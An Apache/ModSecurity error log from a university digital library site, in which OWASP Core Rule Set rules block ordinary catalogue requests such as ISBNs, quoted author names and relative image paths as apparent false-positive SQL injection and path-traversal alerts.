[Mon Aug 28 08:56:52.301048 2023] [:error] [pid 38726] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@5MCo-f0AAJdGkhoAAAAF"]
[Mon Aug 28 08:56:52.530316 2023] [:error] [pid 38726] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@5MCo-f0AAJdGkhsAAAAF"]
[Mon Aug 28 09:06:19.677095 2023] [:error] [pid 38772] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20220926_09370512.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwBG8Co-f0AAJd0nlgAAAAC"]
[Mon Aug 28 09:07:48.062249 2023] [:error] [pid 38769] [client 47.128.30.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+ETIKA+PENGAWASAN". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+ETIKA+PENGAWASAN\\x22:  ETIKA PENGAWASAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwBdMCo-f0AAJdxrUEAAAAS"]
[Mon Aug 28 09:07:54.659075 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-6716-09-0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwBesCo-f0AAJcb5BMAAAAP"]
[Mon Aug 28 09:07:55.714584 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-6716-09-0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwBe8Co-f0AAJcb5BQAAAAP"]
[Mon Aug 28 09:09:59.250447 2023] [:error] [pid 38765] [client 47.128.26.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nannapaneni Narayana Rao\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwB98Co-f0AAJdtoecAAAAO"]
[Mon Aug 28 09:10:28.059049 2023] [:error] [pid 38769] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20220922_11004453.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwCFMCo-f0AAJdxrUUAAAAS"]
[Mon Aug 28 09:13:11.806455 2023] [:error] [pid 39206] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:keywords: 978-602-217-284-0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwCt8Co-f0AAJkmjzQAAAAH"]
[Mon Aug 28 09:13:53.283769 2023] [:error] [pid 39229] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/persons/person.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwC4cCo-f0AAJk9F4cAAAAC"]
[Mon Aug 28 09:14:10.303014 2023] [:error] [pid 39229] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:keywords: 978-602-217-284-0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwC8sCo-f0AAJk9F4kAAAAC"]
[Mon Aug 28 09:14:37.150780 2023] [:error] [pid 39172] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/persons/person.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwDDcCo-f0AAJkEr9MAAAAE"]
[Mon Aug 28 09:15:45.417129 2023] [:error] [pid 39241] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KOMPILASI UNDANG-UNDANG PERPAJAKAN TERLENGKAP\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwDUcCo-f0AAJlJPHYAAAAA"]
[Mon Aug 28 09:17:28.852511 2023] [:error] [pid 39232] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ROMLI, USEP\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwDuMCo-f0AAJlAIuYAAAAJ"]
[Mon Aug 28 09:19:55.169733 2023] [:error] [pid 39324] [client 47.128.30.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EKONOMI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwES8Co-f0AAJmc3@wAAAAE"]
[Mon Aug 28 09:26:55.981590 2023] [:error] [pid 39329] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22INSIDE MANAGEMENT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwF78Co-f0AAJmhJwsAAAAP"]
[Mon Aug 28 09:27:52.617652 2023] [:error] [pid 39438] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEDOMAN PRAKTIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwGKMCo-f0AAJoOLpAAAAAM"]
[Mon Aug 28 09:29:15.882765 2023] [:error] [pid 39437] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20220926_09394850.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwGe8Co-f0AAJoN7w0AAAAL"]
[Mon Aug 28 09:32:52.159594 2023] [:error] [pid 39507] [client 47.128.23.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22RIIS, JENS O.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwHVMCo-f0AAJpTRo4AAAAZ"]
[Mon Aug 28 09:33:02.000768 2023] [:error] [pid 39500] [client 47.128.20.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22KARTIKA, DHARSOONO SONY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwHXcCo-f0AAJpMBF0AAAAI"]
[Mon Aug 28 09:33:09.814575 2023] [:error] [pid 39496] [client 47.128.20.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22KARTIKA, DHARSOONO SONY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwHZcCo-f0AAJpI7jAAAAAH"]
[Mon Aug 28 09:37:18.283843 2023] [:error] [pid 39493] [client 47.128.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ARIMULADI, SETIA UNTUNG\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwIXsCo-f0AAJpFIQ0AAAAU"]
[Mon Aug 28 09:37:18.362460 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20220926_10434610.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwIXsCo-f0AAJqS008AAAAP"]
[Mon Aug 28 09:38:12.951606 2023] [:error] [pid 39567] [client 47.128.28.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ELEMEN ELEMEN ELEKTROMAGNETIKA TEKNIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwIlMCo-f0AAJqPHf4AAAAK"]
[Mon Aug 28 09:40:35.683241 2023] [:error] [pid 39674] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KETIKA REINKARNASI MENJADI PILIHAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwJI8Co-f0AAJr6T7EAAAAd"]
[Mon Aug 28 09:42:04.286270 2023] [:error] [pid 39676] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22FATWA-FATWA MEDIS KONTEMPORER - SEPUTARAN KEHAMILA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwJfMCo-f0AAJr80XIAAAAf"]
[Mon Aug 28 09:57:46.662103 2023] [:error] [pid 39788] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22APA DAN SIAPA HIZBULLAH & NASRALLAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwNKsCo-f0AAJtsYToAAAAA"]
[Mon Aug 28 09:59:00.775240 2023] [:error] [pid 39800] [client 52.167.144.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MAURO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwNdMCo-f0AAJt4UMYAAAAP"]
[Mon Aug 28 10:01:21.449526 2023] [:error] [pid 39942] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SERI DIMATA PRIBADI MANUSIA HATTA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwOAcCo-f0AAJwG@Y4AAAAA"]
